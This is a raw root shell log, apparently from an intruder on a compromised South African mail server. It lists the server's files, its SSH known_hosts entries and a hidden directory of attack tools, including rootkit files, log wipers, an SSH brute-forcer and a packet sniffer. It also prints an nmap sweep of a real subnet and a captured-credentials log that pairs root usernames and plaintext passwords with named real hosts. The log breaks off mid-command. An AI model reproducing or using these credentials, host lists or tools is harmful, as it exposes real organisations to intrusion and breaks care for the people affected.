-rwxr-xr-x 1 1360 users 5336184 Nov 26 2003 fsav-wks-4.52.2481* -rw-r--r-- 1 root root 46 Apr 9 2003 get -rw-r--r-- 1 root root 12886 Aug 22 2004 histo.tgz drwxr-xr-x 2 root root 48 Jul 28 2003 in/ -rwxr-xr-x 1 516 516 18792 Dec 20 2002 install.sh* -rw-r--r-- 1 1360 users 6247 Nov 26 2003 installation.txt -rw------- 1 root root 1019 Jun 26 2004 irenecountrylodge.co.za drwxr-xr-x 5 root root 144 Sep 8 2004 john-1.6/ -rw-r--r-- 1 root root 497341 Jun 18 2004 john-1.6.tar.gz -rw-r--r-- 1 root root 216846 Oct 15 2004 keep -rwxr-xr-x 1 root root 1518 Sep 1 2004 mail* drwxr-xr-x 2 root root 184 Aug 6 2003 maillog/ -rw-r--r-- 1 root root 16195 Sep 10 2004 mailq -rw-r--r-- 1 root root 68839 Dec 2 2004 mails.lafarge drwxr-xr-x 2 1360 users 216 Nov 26 2003 manual-pages-html/ drwxr-xr-x 2 1360 users 200 Nov 26 2003 manual-pages-txt/ -rw------- 1 root root 290824 Jun 13 09:58 mbox -rwxr-xr-x 1 root root 252 Sep 19 2003 mqueue* -rw-r----- 1 root root 280342788 Dec 9 2004 nestlife.brenda.bak -rw-r--r-- 1 root root 58943 Mar 26 2003 nfmc.log -rw-r--r-- 1 root root 169 Dec 20 21:50 password -rw-rw-r-- 1 516 516 15040 Dec 20 2002 readme.txt -rw-r--r-- 1 root root 1216 Mar 13 2003 relay -rw-r--r-- 1 1360 users 25063 Nov 28 2003 release-notes.txt -rw-r--r-- 1 root root 19699 Sep 1 2004 report -rw-r--r-- 1 root root 3339 Sep 6 2004 report.dean -rwxr-xr-x 1 516 516 2393 Dec 20 2002 resend.sh* -rwxr-xr-x 1 516 516 1659 Dec 20 2002 restore.sh* -rw-r--r-- 1 root root 13594 Dec 5 2003 rrm -rw-r--r-- 1 root root 94280 Jun 10 2004 save -rw-r--r-- 1 root root 10396 Mar 13 2003 sendmail.8.12.security.cr.patch -rw-r----- 1 root root 628 Sep 15 2003 sendmail.st -rwxr-xr-x 1 root root 197 Dec 2 2004 test* drwx------ 2 root root 80 Jun 14 01:20 tmp/ -rw-r--r-- 1 root root 339 Sep 10 2003 todel drwxr-xr-x 3 root root 72 Sep 4 2004 usr/ drwxr-xr-x 3 root root 72 Aug 22 2004 var/ -rw-r--r-- 1 root root 7572 Sep 14 2003 var.trz -rw-r--r-- 1 root root 11829 Jun 10 2004 wondershaper-1.0.tar.gz drwxr-xr-x 2 1000 users 2072 Sep 10 2004 xamime-LINUX/ [root@plet root]# ls BitDefender-sendmail-1.5.5-2.linux-gcc3x.i586.tar.run* Creport Desktop/ Documents/ Mail/ Sreport XAM-BE-33-29672-LINUX-glibc23-sm11.tar.gz XAM-BE-33-31609-LINUX-glibc23-sm11.tar.gz XAM-BE-33-31642-LINUX-glibc22-sm11.tar.gz XAM-LEVEL3-33-33946-LINUX-glibc23-sm11.tar.gz XAM-LEVEL3-33-34116-LINUX-glibc23-sm11.tar.gz aliases.frogav.co.za* altermime-0.3.6/ altermime-0.3.6.tar.gz apg-2.2.3/ apg-2.2.3-1mdk.i586.rpm apg-2.2.3.tar.gz cleanxmime* core.13099 core.13184 core.13191 core.18972 csav-4.80.7-shared.i386.rpm dead.letter doc_linux.zip domainlist drakx/ fernando fetchmail.txt fsav-wks-4-52-2481.tgz fsav-wks-4.52.2481* get histo.tgz in/ install.sh* installation.txt irenecountrylodge.co.za john-1.6/ john-1.6.tar.gz keep mail* maillog/ mailq mails.lafarge manual-pages-html/ manual-pages-txt/ mbox mqueue* nestlife.brenda.bak nfmc.log password readme.txt relay release-notes.txt report report.dean resend.sh* restore.sh* rrm save sendmail.8.12.security.cr.patch sendmail.st test* tmp/ todel usr/ var/ var.trz wondershaper-1.0.tar.gz xamime-LINUX/ You have new mail in /var/spool/mail/root [root@plet root]# cd .ssh [root@plet .ssh]# cat known_hosts 196.15.249.209 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzIEVgzYxi0gw7M8wAmcNVKU3OedR13O+Bwq7EAJr2FznpiLi2xlRA3VMjdzphZCItWIR0gd48haQgYM8km7DSYkeOTnjBrD4VaRKdJf9ifdXPMVsdiKqhps1qYDn3futnYb/EcVOywHc+KqtxqY6gZT0XP8S+MOHfVqRW+ZWUA8= lin02,196.15.249.201 ssh-dss AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw== 165.165.107.238 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2XESYRkpCv/TQJOuR+lxYpCij1p66Yk8goiDFG5apRkQyx0dpOy5E64j+WkPwP/j9znFQg7I0rljyuxOtYwlQy4Lfh2j8zvjcVE/dmV8ohsJXmjDHwoB3oOBuiGyntCivaNaoRzbghi+8DRx0gf2t3mRlD9fnTEl7Ud2z5pxbwU= 155.239.167.164 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziMryJmik3B2/tFadx/se7CBSyu35sYQFCRjPdKbJ7sdrCghvE5I44s4eHhlK11iqig35KetEyVYv1JbAiw2gBxRgmPPjCl7sV+ZJ/6IpbkjmPA4sLHLkF6pg7byTXMTdBm6lHQ22mcd1/FnF9/CglBAaHu3DivAStEX5jQ/b0c= 165.165.138.230 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuH7AEnMVFlmYgo+gohImyodnKsaJFVr6EOtLP4bbxWpnWvXa2zcJV7dC7njWpVn66kDU7w3JXS8WXjkTuqm5gkUZrbHTCFwSsIZZT+J6Z9SuOAega430ZuZdlVQ3bRAEensLq6B01u0w70GKPgFz7nG2fuEMvjs71w5+4HT6RG8= lin02.compumail.co.za ssh-dss AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw== 165.146.63.159 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuH7AEnMVFlmYgo+gohImyodnKsaJFVr6EOtLP4bbxWpnWvXa2zcJV7dC7njWpVn66kDU7w3JXS8WXjkTuqm5gkUZrbHTCFwSsIZZT+J6Z9SuOAega430ZuZdlVQ3bRAEensLq6B01u0w70GKPgFz7nG2fuEMvjs71w5+4HT6RG8= 155.239.167.203 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziMryJmik3B2/tFadx/se7CBSyu35sYQFCRjPdKbJ7sdrCghvE5I44s4eHhlK11iqig35KetEyVYv1JbAiw2gBxRgmPPjCl7sV+ZJ/6IpbkjmPA4sLHLkF6pg7byTXMTdBm6lHQ22mcd1/FnF9/CglBAaHu3DivAStEX5jQ/b0c= knysna,196.15.249.203 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU= localhost 1024 41 104815528740090300232762682062148731692345617648761884893144749702438178716507602106384467348442332555726272229905090060865518152094220166348851874522827117669256069180699567468232805547620203421525417575684002027686936703327559508891840428578000903598085456851354927023314524854708653799840391129004567592229 localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs= lin02.lanlink.co.za ssh-dss AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw== 196.15.249.204 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs= 165.165.202.94 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2XESYRkpCv/TQJOuR+lxYpCij1p66Yk8goiDFG5apRkQyx0dpOy5E64j+WkPwP/j9znFQg7I0rljyuxOtYwlQy4Lfh2j8zvjcVE/dmV8ohsJXmjDHwoB3oOBuiGyntCivaNaoRzbghi+8DRx0gf2t3mRlD9fnTEl7Ud2z5pxbwU= 165.146.53.0 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA8crY2nm4Am0IqA436GvY4UcxQLVa0LDgtZu+bbXhyV8AwW8qR8ZQi5N2KpRzLwMQ6iIwPRkamg2rl/8FrmId/k38vfRqDNnxLTPDH+Ir36xDseITZjWU0vvkFh68J2jKftQ8v7M33UxdyQGnYD1B3w96YIEpslt1G2RO4nTfNyU= 69.42.77.57 ssh-dss AAAAB3NzaC1kc3MAAACBAPu/Axyn2e2BmPBn0PN72OJloSk2xAVSvR+pVTI5Q7/W2GmLnYus9tq1qqXziJ1YprvPLZCHYUO8xuVcOBCVc2aInp7nl6Ti0jWMLz6bxYUerH8YRQAFSMDAcfxAjPippPRSsOgGpP412+YUbjiDB8OrI3xYTm5DwOipK1+K3tAHAAAAFQDe9R/Qj+QVlpWB1ch6O4jqUND1yQAAAIBMolOri0TE60UDQHliN4Ubn2Yb8jDpIOftPBWKi0WTKMVqeeH/JmDLgNGjq9OjV0TbWbkEBjnrwFph96+f5QUmDcIns0hQHa2cgQ9yCF7k4/ZTraMItxQ0SOsUV0v9Soe2nIpfhJh8zl38qW2Xn0BBg+YdzBau3WJhLDzck4pWiAAAAIEA4Uizqh111maVE8pB62XPtOHNMX+FTmlvMu+0ezDNa7qW1FysoRlTsYNQC/YQS/5Ly+ktoIcQnt1+bOEVzqtmQdy2q6ZmmWKs9ig40NxojbUTSG5oaVmKoHXsdJYoukTdx0fi36lPwZ876zDuWfQ1qEwh4bnP+8ywr+zToSjU89Q= knysna.compumail.co.za ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU= sodwana.compumail.co.za,196.15.249.207 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAnRLlmrqsBVpPKzy+ycibPbk/8Yo146BYtGSmrEuXxyiKFHiQ28qAHOr1DK1LNVqHRNwe0XJcwqF0MWneLDoNRAjElSxEoqGnhXgYXgLhTgjSVyafBjNAQk000tQ/0MIrYmRBQ7JFIMMNQaCcA45LKAlJ5xaAyG75v+KEHS5Vha8= uvongo,196.15.249.193 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwOyZQMPIn1EdkLP1//ImSO4406UUrW6klYua92ATW3fu5/6ZBIQuIjzxHAwesomdW3SWN7yUGfYUw048kG3hz50TH0HGIYilNEiO2ir0JzD+cDPeGwB0xBkX0JEFqw3Mh5TjByqM2XdSbbX5s9x8KvN9ZwPyP5W7focFis1SqxU= grimhosting.com,209.59.136.207 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA316wYrE01vNOTi0CxuGDfThzfnJPKdWCs3HVQspofi2qlHxdXXU/UsM98sMUz14MYLQqH7evt4VpY0l2y1VZXAT2hLIrfGlWleZx/xY4MDKFDdD9m9WnvMwx/GO5WNCOuxNf9F7c8pPCU7qUuhL1IYQx1lPE5nsEJis3DDlnt+k= 196.25.45.234 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr1lRkcyjE/oLNoXeIw/ScHBYycVEXK5XBV3u6J/EONm662V5pLqRYeNq1ONvnJXztyFfvcxUFE0IfUhFX84NXkHr19vJqoht60hl9/Z7xGRj/f0fdMRE1JJIU7AHBpcSu1IlqCceV2qI88imxM1MDGD6f4R7IPCc4AZ5yu/T9NU= parktonian.no-ip.info,165.165.85.80 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAz1LHpXltGLXL+M4BMdffcoTh460gRQ398M3HVGzQPB670q0Un3VL9mq6f9z5Wu7taONBxgUXMnX782OK95odj0G5H9/vAEO/jvEliqaeUP+9syBFCPHyjzAWOQw+AVD8n5x1gIgLNYlyeY65X4Oq3RCzwcUg4oIi/11TvKILDVM= 192.34.71.51 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzl+gd6A8l1mIe6xABeXzaAJygi0QmCSL1VZboBSk/NnFQxR23tLiUSgPRcVgvar61FfC76IcEeM7t7noESMHN3qnAsnjHbazH5x8epJkHczs+bBObR7aLvTG+/FF0llq4YScGVa/U+VMOYFZRcr47UD/ZkwbXvQI0S9776KAFHM= 208.236.67.2 1024 37 128239661996092802462484923133165440599676388125800690465563291965345544098097414632851814530805241501184097958010013785810757628995111461006238545117388745177411998228478101029758563210814516607167100707354341996649219755156939397397742917097273048832780655761449692253286578799488307974605547010992919492263 196.25.45.246 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1csDK8MRn20spxpnjvCLeQ93XQdTHWcACFzBk2oGM04yH5sPjW+Ia4T0bFf+7BehJh/38gcWGg7N8puZjcVXUPykc7mGT0OsMLukR4sJiQZjbgfDPdnIh5P+OlSrYkyN00pcmrECJ1yO9imbzfUYkknUnpCJPl324W90RGoL3I0= 196.25.45.254 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsLCjGV6av0CmgvSp98rtyPq0mYm/YVKAhBxKbthtC6yhnbN5WTSdrZhRwuoEoafLoUdbwr/iYfKIrylwnYT96EccphwpwFBO3YiK+fK7LF1/LVizWat+NZJHTjLKmfAvrF51l3lyZR1AEZSziM7p884tIh5UeUktf/TRS8kFz88= mail.logisticor.com,165.146.7.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvlDoESxTN5fjfML7q0EyCySK8UffrwwNpDgH2RxxNrXWg47hQoqwWHr9TM5czoe4z0Z4QizqfzwqlD4rkFnDbpVI7nx99+WIt2aRKzjOxQzRPpl7b75FDPsYxlV2hdPkSZnVCZBBESfWkhG+5PjCjRdYu/JyjrndFrrOHrBxHis= 196.7.143.167 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAq/thnwCanNbgm1SxPQ1hqA556ZqMmrVbXVXHS7G4Sp1neLUUC5ufGoootqCcJ6JPkNXSZi1mofkDv1bLEnW6mR4Qwo2gEvKZmkaaTYMZuM+Zuaw91R9IB1bYPb2MCdbg+DMKo52JTYdKNsBNk0wvKrF0+4O6AgoV5xBa2IgBOM0= histologic.no-ip.info,165.146.101.31 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwmaXcYfjdIrrZVxzBHLc0C0nWqBEHX4APDdh0oVz6q6pCjWYcn3EJ4HGYWxdqWKfd3tQ6A7qNpJoL8U8nOtOPSEpfKjfolUYbVdFUcey66RHSS7qzZ/QVt1Fj5CBok2VMLSppqNqIAJPsmiUWF0x6KfAnEqTvSAjwbY/3xLKdMM= 129.7.238.59 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwX6dWLcT3kzxkTrn2yQICAq/ISj6ECjj0KWjAOv/ctcTVRSa648kdhtaNf8B/pEpB/I9M/9OVYbSpSgtn+8KDWUnw+BbiNGwkmROyErAghmFLh+BpbSVNtYk6C/xUZTVR/E4qTMqzFlWXNWoG3yajKZ2DSslCBcIS8iBMeoFnu8= 64.0.82.34 ssh-dss AAAAB3NzaC1kc3MAAACBALfR2hyuGRXwIO4+JjbcZoh6OBo2LlRjwNW/o+gp/Ur3TrP9yiCs3wpfjYybNZ7PdS8aRjpk6ifKV6Rjhx6QutMG77/kHe19Epx8/vITWNFyumsnGGY1Ndaq5sTsTyfd2yvmVxelwjDVWBIlasQITMxosPlj1zA9oiseP5cqAc33AAAAFQDl18RGZxaSCouKiI6Uf20uLOOmMQAAAIB3XHXXUZOv1g6XGqVzPL8GD7PTO7UHUyvNU1DFD23zz3RZ6gR+dpN7rFBcOeQlNfMkrAeAk8dcQAn6Iyrb7HNIE2exnDx5mLTIlHsFR6q8nn866I/ZX/UY73Wnf1tTsGwfMQbyiv3cEjsIVNlp0OHv6ZHWJonz7mfSRBhPTCkMqwAAAIApLhC1Gfgu54vKQePoN3s7xRnIY5fDSJLejsS5i9J/PCIOitF9ARc4xk29gqZrG379sFmCVmhCzib7dsctz9GdTfxwc2lq9im7xtiqgTe08Qkni7aWDxWpX0U2XLZLp4LLVIYqBt+/+B2cgQ76ItpwyQ92pviD1zpAVOUhUzHDfA== krack.phracked.com,66.205.242.108 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw+235jJfRt2cwtXgHalZERdyW7eP/P/fkEALsAeAamScRh5poRcuglyludUx3TbqWUBm5c0eXCcHJuDuzbz75jlB4s55GPO+jakojT+WHC5+NlAfOM2PjBPx2ICRUFz4oiKauviP+GXofPOLhJwk4UWQ3sb7sDL7zgkJyTeNhN8= 165.146.106.34 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwmaXcYfjdIrrZVxzBHLc0C0nWqBEHX4APDdh0oVz6q6pCjWYcn3EJ4HGYWxdqWKfd3tQ6A7qNpJoL8U8nOtOPSEpfKjfolUYbVdFUcey66RHSS7qzZ/QVt1Fj5CBok2VMLSppqNqIAJPsmiUWF0x6KfAnEqTvSAjwbY/3xLKdMM= 64.6.7.234 ssh-dss AAAAB3NzaC1kc3MAAACBANzvmy1CSPp23Z/uRI6ig71ltdUayUuzaxAdQADrOR1YfkGt2xgJoveS3gXUjVtcBfhtYteBVgM9UDxnw6W5AgMogcrc8YOsidN54oJ8ZjWZhSJ5sf2oSiNUfF8XI8x532KPgQKPjXVfmZ1pqaQYq8530/6EhAgNQVLDVbg1ow4rAAAAFQCSIrvhKkNAtzeZYUtgDoDsA74M4wAAAIEAmxDNlpMpi/ILC1ca8ukU/zPmFk3EstVmljfT2cgeWAffAPnsZfpJ6ivQ19v6DFONq9iX0TAF8S4NXfWKyYeY3TRHj1boPu8eyyrDN5jOPc9DjIyRenemBNGb7JxJUUzMb5aKLJ1+3vuSlSPhyRoez8UXjLtcQID3VF8ULEBfhMgAAACBAIQgV7qMmFwXzPasro4o2bxLGpxLGaIi+XV0pz3l+GOio15GI1mfQnXbbhq0Jip+y+8iW49gfygP6sGiFCfumqv18keo/4/LYPycqEMPVsNJLj937X7PPMx9dG/OdQ7oRpVfx1cqQwUTE71kb7g1Wxrvmbtu6HfjSBLqhYoNxmJu 127.0.0.1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs= [root@plet .ssh]# uname -a ;id;w Linux plet.compumail.co.za 2.4.19-16mdksmp #1 SMP Fri Sep 20 16:08:37 CEST 2002 i686 unknown unknown GNU/Linux uid=0(root) gid=0(root) groups=0(root) 1:29am up 14 days, 17:07, 0 users, load average: 0.21, 0.30, 0.38 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [root@plet .ssh]# cd /tmp/ [root@plet tmp]# ls -la total 14 drwxrwxrwt 5 root root 360 Jun 14 01:28 ./ drwxr-xr-x 21 root adm 880 May 30 08:20 ../ d--S--S--T 18 root root 1416 Jun 14 01:00 .../ -rw-rw-rw- 1 ratana_g ratana_g 4 Jun 13 15:00 .900.f5a648 drwxrwxrwt 2 xfs xfs 72 Sep 12 2003 .font-unix/ srw------- 1 root root 0 May 22 10:14 .fsav-0= srw------- 1 root root 0 Jun 14 01:28 .fsav-0-sa= -rw-r--r-- 1 root root 0 Jun 13 04:10 authfail.log.unsort -rw-r--r-- 1 root root 0 Jun 13 04:10 denied.log.unsort -rw-r--r-- 1 root root 554 Jun 14 00:58 ls -rw-r--r-- 1 root root 0 Jun 13 04:10 sarg.log.unsort drwx------ 2 root root 80 Feb 27 2003 ssh-XXE002K6/ [root@plet tmp]# cd ... [root@plet ...]# ls -la total 159052 d--S--S--T 18 root root 1416 Jun 14 01:00 ./ drwxrwxrwt 5 root root 360 Jun 14 01:30 ../ -rw-r--r-- 1 root root 21788442 Jun 14 01:30 .sniff -rw-r--r-- 1 root root 121983894 Jan 1 18:25 .sniff.old -rw-r--r-- 1 root root 6178477 May 20 08:28 .sniff.old2 drwxr-xr-x 12 dlv_bern 1038 1200 Apr 23 20:36 BitchX/ drwxr-sr-x 2 root root 120 Jun 8 04:33 afp/ drwxrwxrwx 8 3232 ntools 928 Jan 14 06:35 cfengine-2.0.7/ -rw-r--r-- 1 root root 1190033 May 15 2003 cfengine-2.0.7.tar.gz drwxr-sr-x 2 root root 96 Jun 8 18:12 cimap/ drwxr-xr-x 10 1001 wheel 864 Jun 11 15:54 h4ckwebdav/ -rw-r--r-- 1 root root 405818 Jun 11 15:51 h4ckwebdav.tar.gz -rwx------ 1 root root 12014 Sep 14 2004 hide* drwxr-sr-x 2 root root 152 Jun 6 17:31 imap/ -rw-r--r-- 1 root root 6550 Apr 23 20:32 index.html -rw-r--r-- 1 root root 2532476 Mar 27 2004 ircii-pana-1.1-final.tar.gz -rw-r--r-- 1 root root 1153560 Dec 11 2003 irssi-0.8.9.tar.gz drwxr-sr-x 5 root root 144 May 12 23:33 john-1.6/ -rw-r--r-- 1 root root 497341 Sep 18 1999 john-1.6.tar.gz -rw-r--r-- 1 root root 0 Jun 13 05:41 mail.hm drwxrwxrwx 32 1000 1000 1416 May 28 08:05 mailutils-0.6/ -rw-r--r-- 1 root root 2837017 Dec 23 20:19 mailutils-0.6.tar.gz drwxrwxrwx 4 500 frog_rud 1824 Jun 8 15:42 nano-1.2.5/ -rw-r--r-- 1 root root 911938 May 16 06:06 nano-1.2.5.tar.gz -rw-r--r-- 1 root root 1846196 Apr 24 08:58 nmap-3.81.tgz -rw-r--r-- 1 root root 2105 Dec 11 2004 nmap.log drwxrwxr-x 7 500 frog_rud 10768 Jun 8 15:56 openssh-3.4p1/ -rw-r--r-- 1 root root 837668 Sep 17 2002 openssh-3.4p1.tar.gz -rw-r--r-- 1 root root 312224 Jun 24 2004 psyBNC2.3.1.tar.gz drwxrwxr-x 11 root root 728 Mar 9 08:58 psybnc/ drwxr-sr-x 2 root root 176 May 27 21:41 rlogin/ -rw------- 1 1010 dlv_bern 263 Feb 18 2000 rootkitutil.h drwxr-xr-x 3 root wheel 216 Jan 2 07:58 shoutcast-1-9-4-linux-glibc6/ -rw-r--r-- 1 root root 152616 Mar 18 2004 shoutcast-1-9-4-linux-glibc6.tar.gz drwxr-xr-x 2 root root 632 May 11 23:10 shroud-1.30/ -rw-r--r-- 1 root root 9248 Nov 3 2002 shroud-1.30.tgz -rwxr-xr-x 1 root root 20416 May 13 00:43 sol* -rw-r--r-- 1 root root 12529 May 13 00:42 sol.c drwxr-sr-x 2 root root 256 Jun 12 03:37 sshbrute/ -rw-r--r-- 1 root root 2402 Jun 10 06:21 ssheist-1.log drwxr-sr-x 3 root root 656 May 12 04:03 synscan/ -rw-r--r-- 1 root root 53939 Mar 22 2002 synscan1.6.tar.gz -rwxr-xr-x 1 root root 19860 May 11 23:13 vanish2* -rw------- 1 1010 dlv_bern 8525 Feb 18 2000 vanish2.c -rw-r--r-- 1 root root 3256 Feb 18 2000 vanish2.tgz [root@plet ...]# cat nmap.log Host 196.15.249.65 appears to be up. Host 196.15.249.66 appears to be up. Host 196.15.249.69 appears to be up. Host 196.15.249.73 appears to be up. Host 196.15.249.74 appears to be up. Host 196.15.249.77 appears to be up. Host 196.15.249.81 appears to be up. Host 196.15.249.82 appears to be up. Host 196.15.249.83 appears to be up. Host 196.15.249.84 appears to be up. Host 196.15.249.85 appears to be up. Host 196.15.249.86 appears to be up. Host 196.15.249.87 appears to be up. Host 196.15.249.88 appears to be up. Host 196.15.249.89 appears to be up. Host 196.15.249.90 appears to be up. Host 196.15.249.91 appears to be up. Host 196.15.249.92 appears to be up. Host 196.15.249.93 appears to be up. Host 196.15.249.94 appears to be up. Host 196.15.249.97 appears to be up. Host 196.15.249.99 appears to be up. Host 196.15.249.105 appears to be up. Host 196.15.249.108 appears to be up. Host 196.15.249.109 appears to be up. Host 196.15.249.110 appears to be up. Host 196.15.249.113 appears to be up. Host 196.15.249.114 appears to be up. Host 196.15.249.117 appears to be up. Host 196.15.249.121 appears to be up. Host 196.15.249.122 appears to be up. Host 196.15.249.125 appears to be up. Host 196.15.249.126 appears to be up. Host uvongo.compumail.co.za (196.15.249.193) appears to be up. Host srv1.lanlink.co.za (196.15.249.195) appears to be up. Host srv1.lanlink.co.za (196.15.249.196) appears to be up. Host 196.15.249.197 appears to be up. Host 196.15.249.198 appears to be up. Host web01.lanlink.co.za (196.15.249.199) appears to be up. Host lin02.lanlink.co.za (196.15.249.201) appears to be up. Host knysna.compumail.co.za (196.15.249.203) appears to be up. Host plet.compumail.co.za (196.15.249.204) appears to be up. Host website.lanlink.co.za (196.15.249.206) appears to be up. Host sodwana.compumail.co.za (196.15.249.207) appears to be up. Host 196.15.249.209 appears to be up. Host 196.15.249.233 appears to be up. Host 196.15.249.234 appears to be up. Host 196.15.249.237 appears to be up. Host www.atkv.org.za (196.15.249.238) appears to be up. Host 196.15.249.242 appears to be up. [root@plet ...]# cat ssheist-1.log =========================================================================== Username: root Password: n3tw0rk1ng Host: lin02.lanlink.co.za =========================================================================== =========================================================================== Username: root Password: `1q2wsxde Host: lin02.lanlink.co.za =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: localhost =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: sodwana.compumail.co.za =========================================================================== =========================================================================== Username: root Password: coahtr Host: histologic.no-ip.info =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== =========================================================================== Username: test Password: test Host: 129.7.238.59 =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za =========================================================================== [root@plet ...]# cd john-1.6/ [root@plet 